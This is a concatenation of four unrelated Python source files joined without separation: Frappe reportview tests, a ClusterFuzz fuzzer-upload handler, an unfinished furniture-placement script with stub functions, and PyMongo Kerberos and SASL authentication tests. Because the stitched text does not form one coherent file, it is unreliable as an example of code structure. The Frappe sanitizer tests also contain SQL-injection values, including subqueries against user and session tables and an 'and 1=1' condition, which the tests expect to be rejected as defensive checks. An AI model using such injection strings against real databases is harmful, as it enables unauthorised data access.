# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, unittest
from frappe.model.db_query import DatabaseQuery
from frappe.desk.reportview import get_filters_cond
from frappe.permissions import add_user_permission, clear_user_permissions_for_doctype
class TestReportview(unittest.TestCase):
def test_basic(self):
self.assertTrue({"name":"DocType"} in DatabaseQuery("DocType").execute(limit_page_length=None))
def test_fields(self):
self.assertTrue({"name":"DocType", "issingle":0} \
in DatabaseQuery("DocType").execute(fields=["name", "issingle"], limit_page_length=None))
def test_filters_1(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters=[["DocType", "name", "like", "J%"]]))
def test_filters_2(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters=[{"name": ["like", "J%"]}]))
def test_filters_3(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters={"name": ["like", "J%"]}))
def test_filters_4(self):
self.assertTrue({"name":"DocField"} \
in DatabaseQuery("DocType").execute(filters={"name": "DocField"}))
def test_in_not_in_filters(self):
self.assertFalse(DatabaseQuery("DocType").execute(filters={"name": ["in", None]}))
self.assertTrue({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters={"name": ["not in", None]}))
for result in [{"name":"DocType"}, {"name":"DocField"}]:
self.assertTrue(result
in DatabaseQuery("DocType").execute(filters={"name": ["in", 'DocType,DocField']}))
for result in [{"name":"DocType"}, {"name":"DocField"}]:
self.assertFalse(result
in DatabaseQuery("DocType").execute(filters={"name": ["not in", 'DocType,DocField']}))
def test_or_filters(self):
data = DatabaseQuery("DocField").execute(
filters={"parent": "DocType"}, fields=["fieldname", "fieldtype"],
or_filters=[{"fieldtype":"Table"}, {"fieldtype":"Select"}])
self.assertTrue({"fieldtype":"Table", "fieldname":"fields"} in data)
self.assertTrue({"fieldtype":"Select", "fieldname":"document_type"} in data)
self.assertFalse({"fieldtype":"Check", "fieldname":"issingle"} in data)
def test_between_filters(self):
""" test case to check between filter for date fields """
frappe.db.sql("delete from tabEvent")
# create events to test the between operator filter
todays_event = create_event()
event1 = create_event(starts_on="2016-07-05 23:59:59")
event2 = create_event(starts_on="2016-07-06 00:00:00")
event3 = create_event(starts_on="2016-07-07 23:59:59")
event4 = create_event(starts_on="2016-07-08 00:00:01")
		# if no values are passed in the filter, events should be filtered against the current datetime
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", None]}, fields=["name"])
self.assertTrue({ "name": event1.name } not in data)
# if both from and to_date values are passed
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", ["2016-07-06", "2016-07-07"]]},
fields=["name"])
self.assertTrue({ "name": event2.name } in data)
self.assertTrue({ "name": event3.name } in data)
self.assertTrue({ "name": event1.name } not in data)
self.assertTrue({ "name": event4.name } not in data)
# if only one value is passed in the filter
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", ["2016-07-07"]]},
fields=["name"])
self.assertTrue({ "name": event3.name } in data)
self.assertTrue({ "name": event4.name } in data)
self.assertTrue({ "name": todays_event.name } in data)
self.assertTrue({ "name": event1.name } not in data)
self.assertTrue({ "name": event2.name } not in data)
def test_ignore_permissions_for_get_filters_cond(self):
frappe.set_user('test2@example.com')
self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict(istable=1), [])
self.assertTrue(get_filters_cond('DocType', dict(istable=1), [], ignore_permissions=True))
frappe.set_user('Administrator')
def test_query_fields_sanitizer(self):
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, version()"], limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, IF(issingle=1, (select name from tabUser), count(name))"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, (select count(*) from tabSessions)"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, IF(issingle=1, (SELECT name from tabUser), count(*))"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle ''"],limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle,'"],limit_start=0, limit_page_length=1)
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "count(name)"],
limit_start=0, limit_page_length=1)
self.assertTrue('count(name)' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "locate('', name) as _relevance"],
limit_start=0, limit_page_length=1)
self.assertTrue('_relevance' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "date(creation) as creation"],
limit_start=0, limit_page_length=1)
self.assertTrue('creation' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle",
"datediff(modified, creation) as date_diff"], limit_start=0, limit_page_length=1)
self.assertTrue('date_diff' in data[0])
def test_nested_permission(self):
clear_user_permissions_for_doctype("File")
delete_test_file_hierarchy() # delete already existing folders
from frappe.core.doctype.file.file import create_new_folder
frappe.set_user('Administrator')
create_new_folder('level1-A', 'Home')
create_new_folder('level2-A', 'Home/level1-A')
create_new_folder('level2-B', 'Home/level1-A')
create_new_folder('level3-A', 'Home/level1-A/level2-A')
create_new_folder('level1-B', 'Home')
create_new_folder('level2-A', 'Home/level1-B')
# user permission for only one root folder
add_user_permission('File', 'Home/level1-A', 'test2@example.com')
from frappe.core.page.permission_manager.permission_manager import update
update('File', 'All', 0, 'if_owner', 0) # to avoid if_owner filter
frappe.set_user('test2@example.com')
data = DatabaseQuery("File").execute()
# children of root folder (for which we added user permission) should be accessible
self.assertTrue({"name": "Home/level1-A/level2-A"} in data)
self.assertTrue({"name": "Home/level1-A/level2-B"} in data)
self.assertTrue({"name": "Home/level1-A/level2-A/level3-A"} in data)
# other folders should not be accessible
self.assertFalse({"name": "Home/level1-B"} in data)
self.assertFalse({"name": "Home/level1-B/level2-B"} in data)
update('File', 'All', 0, 'if_owner', 1)
frappe.set_user('Administrator')
def test_filter_sanitizer(self):
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'istable,': 1}, limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1}, or_filters={'istable,': 1},
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1},
or_filters=[['DocType', 'istable,', '=', 1]],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1},
or_filters=[['DocType', 'istable', '=', 1], ['DocType', 'beta and 1=1', '=', 0]],
limit_start=0, limit_page_length=1)
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'editable_grid': 1, 'module': 'Core'},
or_filters=[['DocType', 'istable', '=', 1]], order_by='creation')
self.assertTrue('DocField' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'issingle': 1}, or_filters=[['DocType', 'module', '=', 'Core']],
order_by='creation')
self.assertTrue('User Permission for Page and Report' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'track_changes': 1, 'module': 'Core'},
order_by='creation')
self.assertTrue('File' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters=[
['DocType', 'ifnull(track_changes, 0)', '=', 0],
['DocType', 'module', '=', 'Core']
], order_by='creation')
self.assertTrue('DefaultValue' in [d['name'] for d in out])
def create_event(subject="_Test Event", starts_on=None):
""" create a test event """
from frappe.utils import get_datetime
event = frappe.get_doc({
"doctype": "Event",
"subject": subject,
"event_type": "Public",
"starts_on": get_datetime(starts_on),
}).insert(ignore_permissions=True)
return event
def delete_test_file_hierarchy():
files_to_delete = [
'Home/level1-A/level2-A/level3-A',
'Home/level1-A/level2-A',
'Home/level1-A/level2-B',
'Home/level1-A',
'Home/level1-B/level2-A',
'Home/level1-B'
]
for file_name in files_to_delete:
frappe.delete_doc('File', file_name)
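# A minimal usage sketch (not part of the test suite) of the filter forms the
# tests above exercise; "ToDo" here is just an illustrative DocType name.
#
#   rows = DatabaseQuery("ToDo").execute(
#       fields=["name", "modified"],
#       filters={"modified": ["between", ["2016-07-06", "2016-07-07"]]},
#       or_filters=[["ToDo", "status", "=", "Open"]],
#       order_by="creation")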
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manage fuzzers types."""
import datetime
import io
from flask import request
from google.cloud import ndb
from clusterfuzz._internal.base import utils
from clusterfuzz._internal.datastore import data_handler
from clusterfuzz._internal.datastore import data_types
from clusterfuzz._internal.fuzzing import fuzzer_selection
from clusterfuzz._internal.google_cloud_utils import storage
from clusterfuzz._internal.metrics import fuzzer_logs
from clusterfuzz._internal.system import archive
from handlers import base_handler
from libs import access
from libs import form
from libs import gcs
from libs import handler
from libs import helpers
ARCHIVE_READ_SIZE_LIMIT = 16 * 1024 * 1024
class Handler(base_handler.Handler):
"""Manages fuzzers."""
@handler.get(handler.HTML)
@handler.check_admin_access_if_oss_fuzz
@handler.check_user_access(need_privileged_access=False)
def get(self):
"""Handle a get request."""
fuzzer_logs_bucket = fuzzer_logs.get_bucket()
fuzzers = list(data_types.Fuzzer.query().order(data_types.Fuzzer.name))
jobs = data_handler.get_all_job_type_names()
corpora = [
bundle.name for bundle in data_types.DataBundle.query().order(
data_types.DataBundle.name)
]
privileged = access.has_access(need_privileged_access=True)
# Unprivileged users can't download fuzzers, so hide the download keys.
if not privileged:
for fuzzer in fuzzers:
fuzzer.blobstore_key = ''
template_values = {
'privileged': privileged,
'fuzzers': fuzzers,
'fuzzerLogsBucket': fuzzer_logs_bucket,
'fieldValues': {
'corpora': corpora,
'jobs': jobs,
'uploadInfo': gcs.prepare_blob_upload()._asdict(),
'csrfToken': form.generate_csrf_token(),
}
}
return self.render('fuzzers.html', template_values)
class BaseEditHandler(base_handler.GcsUploadHandler):
"""Base edit handler."""
def _read_to_bytesio(self, gcs_path):
"""Return a bytesio representing a GCS object."""
data = storage.read_data(gcs_path)
if not data:
raise helpers.EarlyExitException('Failed to read uploaded archive.', 500)
return io.BytesIO(data)
def _get_executable_path(self, upload_info):
"""Get executable path."""
executable_path = request.get('executable_path')
if not upload_info:
return executable_path
if upload_info.size > ARCHIVE_READ_SIZE_LIMIT:
return executable_path
if not executable_path:
executable_path = 'run' # Check for default.
reader = self._read_to_bytesio(upload_info.gcs_path)
return archive.get_first_file_matching(executable_path, reader,
upload_info.filename)
def _get_launcher_script(self, upload_info):
"""Get launcher script path."""
launcher_script = request.get('launcher_script')
if not upload_info:
return launcher_script
if not launcher_script:
return None
if upload_info.size > ARCHIVE_READ_SIZE_LIMIT:
return launcher_script
reader = self._read_to_bytesio(upload_info.gcs_path)
launcher_script = archive.get_first_file_matching(launcher_script, reader,
upload_info.filename)
if not launcher_script:
raise helpers.EarlyExitException(
'Specified launcher script was not found in archive!', 400)
return launcher_script
def _get_integer_value(self, key):
"""Check a numeric input value."""
value = request.get(key)
if value is None:
return None
try:
value = int(value)
except (ValueError, TypeError):
raise helpers.EarlyExitException(
'{key} must be an integer.'.format(key=key), 400)
if value <= 0:
raise helpers.EarlyExitException(
'{key} must be > 0.'.format(key=key), 400)
return value
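    # For example (illustrative only): a submitted value of '30' yields 30,
    # while '0', '-5', or 'abc' raise EarlyExitException with a 400 status.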
def apply_fuzzer_changes(self, fuzzer, upload_info):
"""Apply changes to a fuzzer."""
if upload_info and not archive.is_archive(upload_info.filename):
raise helpers.EarlyExitException(
'Sorry, only zip, tgz, tar.gz, tbz, and tar.bz2 archives are '
'allowed!', 400)
if fuzzer.builtin:
executable_path = launcher_script = None
else:
executable_path = self._get_executable_path(upload_info)
launcher_script = self._get_launcher_script(upload_info)
    # Executable path is required for non-builtin fuzzers when it is not
    # already set.
if not fuzzer.executable_path and not executable_path:
raise helpers.EarlyExitException(
'Please enter the path to the executable, or if the archive you '
'uploaded is less than 16MB, ensure that the executable file has '
'"run" in its name.', 400)
jobs = request.get('jobs', [])
timeout = self._get_integer_value('timeout')
max_testcases = self._get_integer_value('max_testcases')
external_contribution = request.get('external_contribution', False)
differential = request.get('differential', False)
environment_string = request.get('additional_environment_string')
data_bundle_name = request.get('data_bundle_name')
# Save the fuzzer file metadata.
if upload_info:
fuzzer.filename = upload_info.filename
fuzzer.blobstore_key = str(upload_info.key())
fuzzer.file_size = utils.get_size_string(upload_info.size)
fuzzer.jobs = jobs
fuzzer.revision = fuzzer.revision + 1
fuzzer.source = helpers.get_user_email()
fuzzer.timeout = timeout
fuzzer.max_testcases = max_testcases
fuzzer.result = None
fuzzer.sample_testcase = None
fuzzer.console_output = None
fuzzer.external_contribution = bool(external_contribution)
fuzzer.differential = bool(differential)
fuzzer.additional_environment_string = environment_string
fuzzer.timestamp = datetime.datetime.utcnow()
fuzzer.data_bundle_name = data_bundle_name
# Update only if a new archive is provided.
if executable_path:
fuzzer.executable_path = executable_path
# Optional. Also, update only if a new archive is provided and contains a
# launcher script.
if launcher_script:
fuzzer.launcher_script = launcher_script
fuzzer.put()
fuzzer_selection.update_mappings_for_fuzzer(fuzzer)
helpers.log('Uploaded fuzzer %s.' % fuzzer.name, helpers.MODIFY_OPERATION)
return self.redirect('/fuzzers')
class CreateHandler(BaseEditHandler):
"""Create a new fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
name = request.get('name')
if not name:
raise helpers.EarlyExitException('Please give the fuzzer a name!', 400)
if not data_types.Fuzzer.VALID_NAME_REGEX.match(name):
raise helpers.EarlyExitException(
'Fuzzer name can only contain letters, numbers, dashes and '
'underscores.', 400)
existing_fuzzer = data_types.Fuzzer.query(data_types.Fuzzer.name == name)
if existing_fuzzer.get():
raise helpers.EarlyExitException(
'Fuzzer already exists. Please use the EDIT button for changes.', 400)
upload_info = self.get_upload()
if not upload_info:
raise helpers.EarlyExitException('Need to upload an archive.', 400)
fuzzer = data_types.Fuzzer()
fuzzer.name = name
fuzzer.revision = 0
return self.apply_fuzzer_changes(fuzzer, upload_info)
class EditHandler(BaseEditHandler):
"""Edit or create a fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
key = helpers.get_integer_key(request)
fuzzer = ndb.Key(data_types.Fuzzer, key).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
upload_info = self.get_upload()
return self.apply_fuzzer_changes(fuzzer, upload_info)
class DeleteHandler(base_handler.Handler):
"""Delete a fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
key = helpers.get_integer_key(request)
fuzzer = ndb.Key(data_types.Fuzzer, key).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
fuzzer_selection.update_mappings_for_fuzzer(fuzzer, mappings=[])
fuzzer.key.delete()
helpers.log('Deleted fuzzer %s' % fuzzer.name, helpers.MODIFY_OPERATION)
return self.redirect('/fuzzers')
class LogHandler(base_handler.Handler):
"""Show the console output from a fuzzer run."""
@handler.check_user_access(need_privileged_access=False)
def get(self, fuzzer_name):
"""Handle a get request."""
helpers.log('LogHandler', fuzzer_name)
fuzzer = data_types.Fuzzer.query(
data_types.Fuzzer.name == fuzzer_name).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
return self.render('viewer.html', {
'title': 'Output for ' + fuzzer.name,
'content': fuzzer.console_output,
})
import furnitureList as fl
import random
import warnArea
import constants
from vector import *
def addPlacedFurniture(placedFurniture, furniture, warnAreas):
placedFurniture.append(furniture)
#Add a warn area for the furniture
warnArea.addWarnArea( warnAreas,
(
fl.getCorner1(furniture),
fl.getCorner2(furniture)
),
warnArea.getWarnLevelForFurniture(fl.getType(furniture))
)
def placeFurniture(placedFurniture, availableFurniture, warnAreas):
for i in warnAreas:
print(i)
freeSpace = fl.getFreeSpace(constants.WARNING_HARD, warnAreas)
print("Free space", freeSpace);
bruteForce(placedFurniture, availableFurniture, warnAreas)
def canPlaceCouch(span, warnAreas):
#Check the coordinates
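    # Note: the 500 values below appear to assume a 500-unit square room
    # (presumably constants.ROOM_WIDTH): a span lying along one wall is
    # mirrored to the opposite wall before checking whether the couch
    # placement would hit a warn area.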
if span[0].x == span[1].x:
if span[0].x == 500:
span[0].x = span[1].x = 0
else:
span[0].x = span[1].x = 500
for i in range(span[0].y, span[1].y + 1):
if warnArea.getWarnLevel(Vector2(span[0].x, i), warnAreas):
return False
else:
if span[0].y == 500:
span[0].y = span[1].y = 0
else:
span[0].y = span[1].y = 500
for i in range(span[0].x, span[1].x + 1):
if warnArea.getWarnLevel(Vector2(i, span[0].y), warnAreas):
return False
return True
def assessScore(furniture, warnAreas):
freeSpaces = fl.getFreeSpace(constants.WARNING_HARD, warnAreas)
if furniture == "bed":
return assessBedScore(freeSpaces)
# elif getType(furniture) == "couch":
# return assessCouchScore(freeSpaces)
elif furniture == "desk":
return assessDeskScore(freeSpaces)
# elif getType(furniture) == "chair":
# return assessChairScore(freeSpaces)
elif furniture == "tv":
return assessTVScore(freeSpaces, warnAreas)
elif furniture == "table":
return assessTableScore(freeSpaces)
# elif getType(furniture) == "rug":
# return assessRugScore(freeSpaces)
elif furniture == "shelf":
return assessShelfScore(freeSpaces)
# Functions for assessing the scores of different pieces of
# furniture. TODO THIS MIGHT NOT WORK WITH THE TV AND COUCH GROUP
#def assessBedScore(freeSpaces):
# spacesWithScore = []
# for space in freeSpaces:
# score = 100
# v1 = space[0]
# v2 = space[1]
# distance = get_distance(v1, v2)
# score *= 1/distance
# if space[0].y != ROOM_WIDTH: #if we are
#
# corner1 = space[0]
# corner2 = space[0].
# if isFree()
# score = 0
# spacesWithScore.append(space + [score])
#
# return spacesWithScore
def bruteForce(placedFurniture, availableFurniture, warnAreas):
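    """Brute-force placement: for each available furniture type, up to 100
    random positions are tried, and a candidate rectangle is accepted when
    warnArea.isFree reports it as free. A desk additionally consumes a chair,
    which is placed directly below it (the desk rectangle offset by the chair
    depth)."""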
print("avail is ", availableFurniture)
for furniture in availableFurniture:
if furniture == "chair":
continue
maxIt = 100 # maximum number of tests
numberOfItems = availableFurniture[furniture]
while maxIt and numberOfItems:
maxIt -= 1
numchairs = availableFurniture["chair"]
if furniture == "desk" and numchairs:
fW = constants.FURNITURE_SIZES[furniture][0] + constants.CHAIR_SIZE[0]
else:
fW = constants.FURNITURE_SIZES[furniture][0]
fH = constants.FURNITURE_SIZES[furniture][1]
randx = random.randint(0, constants.ROOM_WIDTH - fW)
randy = random.randint(0, constants.ROOM_WIDTH - fH)
v1 = Vector2(randx, randy)
v2 = Vector2(randx + fW, randy + fH)
if warnArea.isFree(v1, v2, warnAreas):
if furniture == "desk" and numchairs:
availableFurniture["chair"] -= 1
chairOffset = Vector2(0, constants.CHAIR_SIZE[0])
addPlacedFurniture(placedFurniture, \
createFurniture(v1 + chairOffset, v2 + chairOffset, "chair"), warnAreas)
numberOfItems -= 1
addPlacedFurniture(placedFurniture, \
createFurniture(v1, v2, furniture), warnAreas)
def createFurniture(vec1, vec2, type_):
return (vec1.x, vec1.y, vec2.x, vec2.y, type_)
# TODO probably not applicable
def assessCouchScore(freeSpaces):
pass
def assessDeskScore(freeSpaces):
pass
# TODO probably not applicable
def assessChairScore(freeSpaces):
pass
def assessTVScore(freeSpaces, warnAreas):
spacesWithScore = []
for space in freeSpaces:
score = 100
v1 = space[0]
v2 = space[1]
distance = get_distance(v1, v2)
if distance < constants.TV_SIZE[1]: # if the space does not fit tv...
spacesWithScore.append(space + [0]) # score is 0
continue
score *= 1/distance
if not canPlaceCouch(space, warnAreas):
score = 0
spacesWithScore.append(space + [score])
return spacesWithScore
# TODO probably not applicable
def assessTableScore(freeSpaces):
pass
# TODO probably not applicable
def assessRugScore(freeSpaces):
pass
def assessShelfScore(freeSpaces):
pass
def placeFurnitureInSpan(furnitureName, span, placedFurniture, warnAreas):
    furnitureSize = constants.FURNITURE_SIZES[furnitureName]
    print("Span: ", span)
    width = furnitureSize[0]
    height = furnitureSize[1]
pos0 = Vector2(0,0)
pos1 = Vector2(0,0)
#Calculating the direction of the furniture
    if span[0].y == span[1].y:
        middle = span[0].x + (span[1].x - span[0].x) / 2
        if span[0].y == 0:
            pos0.x = middle - width / 2
            pos0.y = span[0].y
            pos1.x = middle + width / 2
            pos1.y = span[0].y + height
        else:
            pos0.x = middle + width / 2
            pos0.y = span[0].y
            pos1.x = middle - width / 2
            pos1.y = span[0].y - height
    else:
        middle = span[0].y + (span[1].y - span[0].y) / 2
        if span[0].x == 0:
            pos0.x = span[0].x
            pos0.y = middle + width / 2
            pos1.x = span[0].x + height
            pos1.y = middle - width / 2
        else:
            pos0.x = span[0].x
            pos0.y = middle - width / 2
            pos1.x = span[0].x - height
            pos1.y = middle + width / 2
    addPlacedFurniture(placedFurniture, (pos0.x, pos0.y, pos1.x, pos1.y, furnitureName), warnAreas)
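# Usage sketch (illustrative values; assumes "shelf" is a key in
# constants.FURNITURE_SIZES and that the span lies along the y == 0 wall):
#
#   span = (Vector2(100, 0), Vector2(300, 0))
#   placeFurnitureInSpan("shelf", span, placedFurniture, warnAreas)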
###################################################################
# Help functions
###################################################################
###################################################################
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Authentication Tests."""
import os
import sys
import threading
try:
from urllib.parse import quote_plus
except ImportError:
# Python 2
from urllib import quote_plus
sys.path[0:0] = [""]
from pymongo import MongoClient
from pymongo.auth import HAVE_KERBEROS, _build_credentials_tuple
from pymongo.errors import OperationFailure
from pymongo.read_preferences import ReadPreference
from test import client_context, host, port, SkipTest, unittest, Version
from test.utils import delay
# YOU MUST RUN KINIT BEFORE RUNNING GSSAPI TESTS.
GSSAPI_HOST = os.environ.get('GSSAPI_HOST')
GSSAPI_PORT = int(os.environ.get('GSSAPI_PORT', '27017'))
PRINCIPAL = os.environ.get('PRINCIPAL')
SASL_HOST = os.environ.get('SASL_HOST')
SASL_PORT = int(os.environ.get('SASL_PORT', '27017'))
SASL_USER = os.environ.get('SASL_USER')
SASL_PASS = os.environ.get('SASL_PASS')
SASL_DB = os.environ.get('SASL_DB', '$external')
class AutoAuthenticateThread(threading.Thread):
"""Used in testing threaded authentication.
This does collection.find_one() with a 1-second delay to ensure it must
check out and authenticate multiple sockets from the pool concurrently.
:Parameters:
`collection`: An auth-protected collection containing one document.
"""
def __init__(self, collection):
super(AutoAuthenticateThread, self).__init__()
self.collection = collection
self.success = False
def run(self):
assert self.collection.find_one({'$where': delay(1)}) is not None
self.success = True
class TestGSSAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not HAVE_KERBEROS:
raise SkipTest('Kerberos module not available.')
if not GSSAPI_HOST or not PRINCIPAL:
raise SkipTest('Must set GSSAPI_HOST and PRINCIPAL to test GSSAPI')
def test_credentials_hashing(self):
# GSSAPI credentials are properly hashed.
creds0 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass', {})
creds1 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'A'}})
creds2 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'A'}})
creds3 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'B'}})
self.assertEqual(1, len(set([creds1, creds2])))
self.assertEqual(3, len(set([creds0, creds1, creds2, creds3])))
def test_gssapi_simple(self):
# Call authenticate() without authMechanismProperties.
client = MongoClient(GSSAPI_HOST, GSSAPI_PORT)
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
client.test.collection.find_one()
# Log in using URI, without authMechanismProperties.
uri = ('mongodb://%s@%s:%d/?authMechanism='
'GSSAPI' % (quote_plus(PRINCIPAL), GSSAPI_HOST, GSSAPI_PORT))
client = MongoClient(uri)
client.test.collection.find_one()
# Call authenticate() with authMechanismProperties.
self.assertTrue(client.test.authenticate(
PRINCIPAL, mechanism='GSSAPI',
authMechanismProperties='SERVICE_NAME:mongodb'))
client.test.collection.find_one()
# Log in using URI, with authMechanismProperties.
uri = ('mongodb://%s@%s:%d/?authMechanism='
'GSSAPI;authMechanismProperties'
'=SERVICE_NAME:mongodb' % (quote_plus(PRINCIPAL),
GSSAPI_HOST, GSSAPI_PORT))
client = MongoClient(uri)
client.test.collection.find_one()
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(GSSAPI_HOST,
port=GSSAPI_PORT,
replicaSet=set_name)
# Without authMechanismProperties
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
client.database_names()
uri = ('mongodb://%s@%s:%d/?authMechanism=GSSAPI;replicaSet'
'=%s' % (quote_plus(PRINCIPAL),
GSSAPI_HOST, GSSAPI_PORT, str(set_name)))
client = MongoClient(uri)
client.database_names()
# With authMechanismProperties
self.assertTrue(client.test.authenticate(
PRINCIPAL, mechanism='GSSAPI',
authMechanismProperties='SERVICE_NAME:mongodb'))
client.database_names()
uri = ('mongodb://%s@%s:%d/?authMechanism=GSSAPI;replicaSet'
'=%s;authMechanismProperties'
'=SERVICE_NAME:mongodb' % (quote_plus(PRINCIPAL),
GSSAPI_HOST,
GSSAPI_PORT,
str(set_name)))
client = MongoClient(uri)
client.database_names()
def test_gssapi_threaded(self):
client = MongoClient(GSSAPI_HOST)
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
# Need one document in the collection. AutoAuthenticateThread does
# collection.find_one with a 1-second delay, forcing it to check out
# multiple sockets from the pool concurrently, proving that
# auto-authentication works with GSSAPI.
collection = client.test.collection
collection.drop()
collection.insert_one({'_id': 1})
threads = []
for _ in range(4):
threads.append(AutoAuthenticateThread(collection))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(thread.success)
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(GSSAPI_HOST,
replicaSet=set_name,
readPreference='secondary')
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
self.assertTrue(client.test.command('dbstats'))
threads = []
for _ in range(4):
threads.append(AutoAuthenticateThread(collection))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(thread.success)
class TestSASLPlain(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not SASL_HOST or not SASL_USER or not SASL_PASS:
raise SkipTest('Must set SASL_HOST, '
'SASL_USER, and SASL_PASS to test SASL')
def test_sasl_plain(self):
client = MongoClient(SASL_HOST, SASL_PORT)
self.assertTrue(client.ldap.authenticate(SASL_USER, SASL_PASS,
SASL_DB, 'PLAIN'))
client.ldap.test.find_one()
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s' % (quote_plus(SASL_USER),
quote_plus(SASL_PASS),
SASL_HOST, SASL_PORT, SASL_DB))
client = MongoClient(uri)
client.ldap.test.find_one()
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(SASL_HOST,
port=SASL_PORT,
replicaSet=set_name)
self.assertTrue(client.ldap.authenticate(SASL_USER, SASL_PASS,
SASL_DB, 'PLAIN'))
client.ldap.test.find_one()
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s;replicaSet=%s' % (quote_plus(SASL_USER),
quote_plus(SASL_PASS),
SASL_HOST, SASL_PORT,
SASL_DB, str(set_name)))
client = MongoClient(uri)
client.ldap.test.find_one()
def test_sasl_plain_bad_credentials(self):
client = MongoClient(SASL_HOST, SASL_PORT)
# Bad username
self.assertRaises(OperationFailure, client.ldap.authenticate,
'not-user', SASL_PASS, SASL_DB, 'PLAIN')
self.assertRaises(OperationFailure, client.ldap.test.find_one)
self.assertRaises(OperationFailure, client.ldap.test.insert_one,
{"failed": True})
# Bad password
self.assertRaises(OperationFailure, client.ldap.authenticate,
SASL_USER, 'not-pwd', SASL_DB, 'PLAIN')
self.assertRaises(OperationFailure, client.ldap.test.find_one)
self.assertRaises(OperationFailure, client.ldap.test.insert_one,
{"failed": True})
def auth_string(user, password):
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s' % (quote_plus(user),
quote_plus(password),
SASL_HOST, SASL_PORT, SASL_DB))
return uri
bad_user = MongoClient(auth_string('not-user', SASL_PASS))
bad_pwd = MongoClient(auth_string(SASL_USER, 'not-pwd'))
